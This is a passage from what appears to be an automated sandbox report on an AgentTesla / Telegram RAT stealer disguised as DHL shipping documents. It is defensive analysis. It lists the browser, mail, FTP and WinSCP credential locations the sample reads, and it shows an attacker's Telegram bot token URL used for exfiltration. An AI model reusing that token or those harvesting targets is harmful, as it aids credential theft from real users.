                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Disables UAC (registry)
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                      Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.2204997b740.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498422b0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3680847328.00000000032A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documents Of DHL -BL- AWB- 8976453410.exe PID: 3812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5896, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.2204997b740.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498422b0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documents Of DHL -BL- AWB- 8976453410.exe PID: 3812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5896, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.2204997b740.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498422b0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3680847328.00000000032A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documents Of DHL -BL- AWB- 8976453410.exe PID: 3812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5896, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.2204997b740.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498422b0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3680847328.00000000032A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documents Of DHL -BL- AWB- 8976453410.exe PID: 3812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5896, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.2204997b740.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498422b0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documents Of DHL -BL- AWB- 8976453410.exe PID: 3812, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5896, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		21
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts211
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		231
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Timestomp                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model21
                      Input Capture                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets161
                      Virtualization/Sandbox Evasion                      		SSH1
                      Clipboard Data                      		14
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                      Process Injection                      		DCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446731 Sample: Documents Of DHL -BL- AWB- ... Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 23 api.telegram.org 2->23 25 api.ipify.org 2->25 31 Snort IDS alert for network traffic 2->31 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 39 11 other signatures 2->39 8 Documents Of DHL -BL- AWB- 8976453410.exe 1 3 2->8         started        signatures3 37 Uses the Telegram API (likely for C&C communication) 23->37 process4 signatures5 41 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->41 43 Writes to foreign memory regions 8->43 45 Adds a directory exclusion to Windows Defender 8->45 47 2 other signatures 8->47 11 RegAsm.exe 15 2 8->11         started        15 powershell.exe 23 8->15         started        17 WerFault.exe 19 16 8->17         started        19 RegAsm.exe 8->19         started        process6 dnsIp7 27 api.telegram.org 149.154.167.220, 443, 49702, 49705 TELEGRAMRU United Kingdom 11->27 29 api.ipify.org 172.67.74.152, 443, 49700 CLOUDFLARENETUS United States 11->29 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->49 51 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->51 53 Tries to steal Mail credentials (via file / registry access) 11->53 57 3 other signatures 11->57 55 Loading BitLocker PowerShell Module 15->55 21 conhost.exe 15->21         started        signatures8 process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Documents Of DHL -BL- AWB- 8976453410.exe29%ReversingLabsWin64.Trojan.GenSteal
                      Documents Of DHL -BL- AWB- 8976453410.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://api.ipify.org/0%URL Reputationsafe
                      https://api.ipify.org0%URL Reputationsafe
                      http://upx.sf.net0%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://api.telegram.org0%Avira URL Cloudsafe
                      https://api.telegram.org/bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/0%Avira URL Cloudsafe
                      https://api.telegram.org0%Avira URL Cloudsafe
                      https://api.telegram.org/bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ipify.org
                      		172.67.74.152
                      		truefalse
                        		unknown
                        api.telegram.org
                        		149.154.167.220
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocumenttrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgDocuments Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.0000000003261000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://upx.sf.netAmcache.hve.8.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://account.dyn.com/Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgRegAsm.exe, 00000004.00000002.3680847328.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000342C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000348F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.0000000003322000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.00000000033C2000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://api.telegram.orgRegAsm.exe, 00000004.00000002.3680847328.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000342C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000348F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.00000000036BC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.0000000003261000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000004.00000002.3680847328.0000000003261000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          		api.telegram.orgUnited Kingdom
                          		62041TELEGRAMRUtrue
                          172.67.74.152
                          		api.ipify.orgUnited States
                          		13335CLOUDFLARENETUSfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1446731
                          Start date and time:2024-05-23 20:22:49 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 42s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:25
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Documents Of DHL -BL- AWB- 8976453410.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winEXE@9/10@2/2
                          EGA Information:
                          • Successful, ratio: 50%
                          HCA Information:
                          • Successful, ratio: 62%
                          • Number of executed functions: 210
                          • Number of non-executed functions: 8
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.189.173.21
                          • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target Documents Of DHL -BL- AWB- 8976453410.exe, PID 3812 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: Documents Of DHL -BL- AWB- 8976453410.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:23:45API Interceptor18x Sleep call for process: powershell.exe modified
                          14:23:46API Interceptor10645976x Sleep call for process: RegAsm.exe modified
                          14:24:03API Interceptor1x Sleep call for process: WerFault.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220COMMERCIAL INVOICE - BL - AWB 7032805642.exeGet hashmaliciousAgentTeslaBrowse
                            Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                              ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                                  RFQ-101432620247fl#U00e2#U00aexslx.exeGet hashmaliciousAgentTeslaBrowse
                                    QUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                                      MSK203.exeGet hashmaliciousGuLoaderBrowse
                                        New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                          gtKVgxrJ22.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                                            Pg5dhIO92K.exeGet hashmaliciousAgentTeslaBrowse
                                              172.67.74.152K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              stub.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              stub.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                              • api.ipify.org/?format=json
                                              Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/?format=json
                                              Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/?format=json
                                              Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                              • api.ipify.org/?format=json
                                              Sky-Beta.exeGet hashmaliciousStealitBrowse
                                              • api.ipify.org/?format=json
                                              SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/?format=json
                                              SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/?format=json

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              api.telegram.orgCOMMERCIAL INVOICE - BL - AWB 7032805642.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                              • 149.154.167.220
                                              ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                                              • 149.154.167.220
                                              RFQ-101432620247fl#U00e2#U00aexslx.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              QUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              MSK203.exeGet hashmaliciousGuLoaderBrowse
                                              • 149.154.167.220
                                              New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                              • 149.154.167.220
                                              gtKVgxrJ22.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                                              • 149.154.167.220
                                              Pg5dhIO92K.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              api.ipify.orghttps://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                                              • 172.67.74.152
                                              Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                              • 172.67.74.152
                                              30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.12.205
                                              ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.74.152
                                              PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 104.26.12.205
                                              PO_23052024.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.12.205
                                              hesaphareketi-015232024.SCR.exeGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.74.152
                                              rPurchaseOrderPO05232024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 104.26.13.205
                                              ASCD0001 INQ9829......pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              http://t.co/COiSlB3TomGet hashmaliciousHTMLPhisherBrowse
                                              • 104.26.12.205

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TELEGRAMRUCOMMERCIAL INVOICE - BL - AWB 7032805642.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                              • 149.154.167.220
                                              ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                                              • 149.154.167.220
                                              http://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              RFQ-101432620247fl#U00e2#U00aexslx.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
